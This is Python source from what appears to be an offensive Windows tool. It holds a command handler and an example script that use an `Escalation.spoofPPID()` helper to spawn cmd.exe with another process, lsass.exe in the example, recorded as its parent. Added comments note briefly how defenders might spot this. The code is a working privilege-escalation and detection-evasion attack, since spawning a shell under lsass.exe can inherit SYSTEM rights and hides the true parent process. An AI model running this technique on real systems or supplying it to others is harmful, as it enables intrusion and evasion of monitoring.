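def spoof(args):
    """Handle the parent-PID spoofing sub-command.

    Reads two keys from ``args``:

    * ``args['candidates']`` -- when it equals ``True``, print the candidate
      parent processes via ``Escalation.printCandidatesSpoofPPID()``.
    * ``args['pid']`` -- PID passed as ``ppid`` to ``Escalation.spoofPPID()``;
      when it is ``None`` an error is logged and no process is created.

    Returns nothing; the outcome is reported through ``printT`` and
    ``logging``.
    """
    # NOTE(review): the listing was collapsed onto one line, so the nesting is
    # reconstructed; the pid check is treated as a sibling of the candidates
    # check -- confirm against the upstream file.
    if args['candidates'] == True:
        printT("Candidates:")
        esc = Escalation()
        esc.printCandidatesSpoofPPID()
    if args['pid'] is None:
        logging.error("A pid has to be selected")
    else:
        printT("Trying to exploit parent PID Spoofing...")
        esc = Escalation()
        targetPID = args['pid']
        # Defender note: the new cmd.exe is requested with targetPID recorded
        # as its parent, so parent/child lineage in process telemetry does not
        # identify the process that actually issued the creation call.
        #
        # The original discarded this return value and then tested an
        # undefined name `status` against an undefined name `true`, which
        # raised NameError after the call instead of reporting the result.
        # Assumes spoofPPID returns True on success -- confirm in escalation.
        status = esc.spoofPPID(
            ppid=targetPID,
            appName="c:\\windows\\system32\\cmd.exe",
            cmdLine=None,
            lpProcessAttributes=None,
            lpThreadAttributes=None,
            bInheritHandles=0,
            creationFlags=(CREATE_NEW_CONSOLE | EXTENDED_STARTUPINFO_PRESENT),
            lpEnvironment=None,
            lpCurrentDirectory=None,
        )
        if status == True:
            printT("Process created")
        else:
            logging.error("Impossible to create the new process")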
# -*- coding: UTF-8 -*-
# By Quentin HARDY ([email protected]) - bobsecq
#
# Example for the Escalation parent-PID spoofing helpers: print the candidate
# parent processes, then ask spoofPPID() to start cmd.exe with the PID of
# lsass.exe passed as the parent.
#
# Defender note: the new cmd.exe is requested with another process recorded as
# its parent, so lineage-based detections should compare the recorded parent
# with the process that actually issued the creation call.
import sys

# Extend the module search path first, presumably so that the utils and
# escalation imports below resolve from the parent directory.
sys.path.append("../")
from utils import *

# Logging is configured before the escalation module is imported; this order
# is kept from the original.
configureLogging()
from escalation import Escalation

spoofer = Escalation()
spoofer.printCandidatesSpoofPPID()

# NOTE(review): the lookup result is used unchecked; what getPIDfromName
# returns when no process matches is not visible here.
lsass_pid = getPIDfromName("lsass.exe")
new_process_flags = CREATE_NEW_CONSOLE | EXTENDED_STARTUPINFO_PRESENT
spoofer.spoofPPID(
    ppid=lsass_pid,
    appName="c:\\windows\\system32\\cmd.exe",
    cmdLine=None,
    lpProcessAttributes=None,
    lpThreadAttributes=None,
    bInheritHandles=0,
    creationFlags=new_process_flags,
    lpEnvironment=None,
    lpCurrentDirectory=None,
)